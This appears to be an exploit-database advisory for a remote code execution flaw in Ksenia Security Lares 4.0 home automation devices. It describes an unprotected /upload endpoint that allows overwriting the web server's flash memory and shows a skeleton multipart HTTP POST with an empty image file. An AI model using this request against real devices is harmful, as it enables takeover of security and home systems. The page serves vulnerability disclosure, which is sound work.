Ksenia Security Lares 4.0 Home Automation Remote Code Execution

2025.04.01

Credit: ShadeLock

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution
# Google Dork: N/A
# Date: 31 March 2025
# Exploit Author: Mencha 'ShadeLock' Isajlovska
# Vendor Homepage: https://www.kseniasecurity.com/en/
# Software Link: 
https://www.kseniasecurity.com/en/company/why-lares-4-0.html
# Version: Lares 4.0
# Tested on: Ksenia Lares Webserver
# CVE : N/A
# Desc: The device provides access to an unprotected endpoint, enabling
the upload of MPFS File System binary images. Authenticated attackers
can exploit this vulnerability to overwrite the flash program memory
containing the web server's main interfaces, potentially leading to
arbitrary code execution.


POST /upload HTTP/1.1
Host: 192.168.1.2

------WebKitFormBoundary5GYWB4nichZAk7BS
Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"
Content-Type: application/octet-stream


------WebKitFormBoundary5GYWB4nichZAk7BS--

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Ksenia Security Lares 4.0 Home Automation Remote Code Execution

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Ksenia Security Lares 4.0 Home Automation Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.